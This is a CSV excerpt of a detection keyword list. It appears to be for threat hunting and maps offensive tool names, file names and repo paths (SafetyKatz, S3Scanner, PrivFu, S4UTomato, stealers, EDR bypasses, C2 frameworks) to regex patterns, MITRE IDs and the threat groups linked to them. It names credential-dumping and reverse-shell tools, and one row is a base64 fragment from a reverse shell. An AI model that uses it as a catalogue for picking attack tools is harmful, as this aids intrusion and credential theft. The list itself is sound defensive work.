"*S3cur3Th1sSh1t/SharpVeeamDecryptor*",".{0,1000}S3cur3Th1sSh1t\/SharpVeeamDecryptor.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","1","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","57828"
"*S3N4T0R-0X0/Checkmate*",".{0,1000}S3N4T0R\-0X0\/Checkmate.{0,1000}","offensive_tool_keyword","Checkmate","payload Execution by Fake Windows SmartScreen with requires Administrator privileges & Turn off real SmartScreen Filter","T1059 - T1070 - T1546","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/S3N4T0R-0X0/Checkmate","1","1","N/A","N/A","9","1","95","16","2024-01-12T19:03:45Z","2024-01-04T15:56:37Z","57829"
"*s3scanner -*",".{0,1000}s3scanner\s\-.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57830"
"*s3scanner dump *",".{0,1000}s3scanner\sdump\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57831"
"*s3scanner scan *",".{0,1000}s3scanner\sscan\s.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","0","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57832"
"*S3Scanner-master*",".{0,1000}S3Scanner\-master.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57833"
"*s4u.x64.c*",".{0,1000}s4u\.x64\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","57834"
"*s4u.x64.o*",".{0,1000}s4u\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","N/A","10","10","458","51","2025-03-29T18:15:17Z","2023-11-20T10:01:36Z","57835"
"*S4U2self.py*",".{0,1000}S4U2self\.py.{0,1000}","offensive_tool_keyword","noPac","script used in the POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/Ridter/noPac","1","0","N/A","N/A","10","9","862","127","2023-01-29T03:31:27Z","2021-12-13T10:28:12Z","57836"
"*S4uDelegator.*",".{0,1000}S4uDelegator\..{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57837"
"*S4uDelegator.exe*",".{0,1000}S4uDelegator\.exe.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57838"
"*S4ULogonShell.exe*",".{0,1000}S4ULogonShell\.exe.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57839"
"*S4Util - Help for ""enum"" command*",".{0,1000}S4Util\s\-\sHelp\sfor\s\""enum\""\scommand.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","N/A","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","57840"
"*S4UTomato 1.0.0-beta*",".{0,1000}S4UTomato\s1\.0\.0\-beta.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57841"
"*S4UTomato.csproj*",".{0,1000}S4UTomato\.csproj.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57842"
"*S4UTomato.exe*",".{0,1000}S4UTomato\.exe.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57843"
"*S4UTomato.lib*",".{0,1000}S4UTomato\.lib.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57844"
"*S4UTomato.sln*",".{0,1000}S4UTomato\.sln.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57845"
"*S4UTomato-master*",".{0,1000}S4UTomato\-master.{0,1000}","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","1","N/A","N/A","10","4","394","76","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z","57846"
"*S74r77Hr34D(*",".{0,1000}S74r77Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","57847"
"*s74r787Hr34D(*",".{0,1000}s74r787Hr34D\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","57848"
"*s7scan*",".{0,1000}s7scan.{0,1000}","offensive_tool_keyword","Github Username","s7scan is a tool that scans networks. enumerates Siemens PLCs and gathers basic information about them. such as PLC firmware and hardwaare version. network configuration and security parameters. It is completely written on Python.","T1046 - T1018 - T1049 - T1040 - T1016 - T1057","TA0043 - TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/klsecservices/s7scan","1","1","N/A","N/A","N/A","2","139","46","2018-12-28T12:11:56Z","2018-10-12T08:52:04Z","57849"
"*sa7mon/S3Scanner*",".{0,1000}sa7mon\/S3Scanner.{0,1000}","offensive_tool_keyword","S3Scanner","Scan for open S3 buckets and dump the contents","T1583 - T1583.002 - T1114 - T1114.002","TA0010","N/A","N/A","Reconnaissance","https://github.com/sa7mon/S3Scanner","1","1","N/A","N/A","8","10","2743","384","2025-04-21T14:44:23Z","2017-06-19T22:14:21Z","57850"
"*SaadAhla/dropper*",".{0,1000}SaadAhla\/dropper.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","","N/A","","","","57851"
"*SaadAhla/UnhookingPatch*",".{0,1000}SaadAhla\/UnhookingPatch.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","1","N/A","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","57852"
"*SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A*",".{0,1000}SABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4A.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","#base64","N/A","9","10","61","14","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z","57853"
"*sadshade/veeam-creds*",".{0,1000}sadshade\/veeam\-creds.{0,1000}","offensive_tool_keyword","veeam-creds","Collection of scripts to retrieve stored passwords from Veeam Backup","T1003 - T1555.005 - T1552","TA0006 - TA0007","N/A","Dispossessor - Dagon Locker","Credential Access","https://github.com/sadshade/veeam-creds","1","1","N/A","N/A","10","2","126","32","2024-12-12T10:23:54Z","2021-02-05T03:13:08Z","57854"
"*safari_in_operator_side_effect.*",".{0,1000}safari_in_operator_side_effect\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57855"
"*safari_proxy_object_type_confusion.*",".{0,1000}safari_proxy_object_type_confusion\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","57856"
"*SafeBreach-Labs/BITSInject*",".{0,1000}SafeBreach\-Labs\/BITSInject.{0,1000}","offensive_tool_keyword","BITSInject","A one-click tool to inject jobs into the BITS queue (Background Intelligent Transfer Service) allowing arbitrary program execution as the NT AUTHORITY/SYSTEM account","T1197","TA0004","N/A","N/A","Privilege Escalation","https://github.com/SafeBreach-Labs/BITSInject","1","1","N/A","N/A","8","1","99","18","2019-08-24T22:02:12Z","2017-07-03T12:39:38Z","57857"
"*SafeBreach-Labs/DoubleDrive*",".{0,1000}SafeBreach\-Labs\/DoubleDrive.{0,1000}","offensive_tool_keyword","DoubleDrive","A fully-undetectable ransomware that utilizes OneDrive & Google Drive to encrypt target local files","T1486 - T1562.001 - T1213 - T1070.004 - T1070.006 - T1105","TA0040 - TA0009 - TA0011 - TA0005","N/A","N/A","Ransomware","https://github.com/SafeBreach-Labs/DoubleDrive","1","1","N/A","N/A","10","2","124","14","2024-05-28T16:25:59Z","2023-05-23T13:17:38Z","57858"
"*SafeBreach-Labs/EDRaser*",".{0,1000}SafeBreach\-Labs\/EDRaser.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","57859"
"*SafeBreach-Labs/PoolParty*",".{0,1000}SafeBreach\-Labs\/PoolParty.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","1","N/A","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","57860"
"*SafeBreach-Labs/SirepRAT*",".{0,1000}SafeBreach\-Labs\/SirepRAT.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","57861"
"*SafeBreach-Labs/WindowsDowndate*",".{0,1000}SafeBreach\-Labs\/WindowsDowndate.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","57862"
"*safedv/RustiveDump*",".{0,1000}safedv\/RustiveDump.{0,1000}","offensive_tool_keyword","RustiveDump","LSASS memory dumper using only NTAPIs","T1003.001 - T1055 - T1106","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/safedv/RustiveDump","1","1","N/A","N/A","10","4","332","43","2025-03-08T12:10:35Z","2024-10-06T16:01:49Z","57863"
"*safetydump*",".{0,1000}safetydump.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","57864"
"*SafetyDump.exe *",".{0,1000}SafetyDump\.exe\s.{0,1000}","offensive_tool_keyword","SafetyDump","uses the Minidump Windows API to dump process memory before base64 encoding that dump and writing it to standard output. This allows the dump to be redirected to a file or straight back down C2 or through other tools","T1003 - T1140 - T1071 - T1105","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/riskydissonance/SafetyDump","1","0","N/A","N/A","10","2","162","16","2020-10-29T16:25:04Z","2019-12-10T14:45:17Z","57865"
"*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","57866"
"*safetydump.ninja*",".{0,1000}safetydump\.ninja.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","57867"
"*SafetyKatz.csproj*",".{0,1000}SafetyKatz\.csproj.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57868"
"*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","N/A","10","10","1518","221","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z","57869"
"*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","1","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","57870"
"*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57871"
"*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","57872"
"*SafetyKatz.exe*",".{0,1000}SafetyKatz\.exe.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","1","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","57873"
"*SafetyKatz.json*",".{0,1000}SafetyKatz\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","57874"
"*SafetyKatz.Program*",".{0,1000}SafetyKatz\.Program.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","57875"
"*SafetyKatz.sln*",".{0,1000}SafetyKatz\.sln.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","57876"
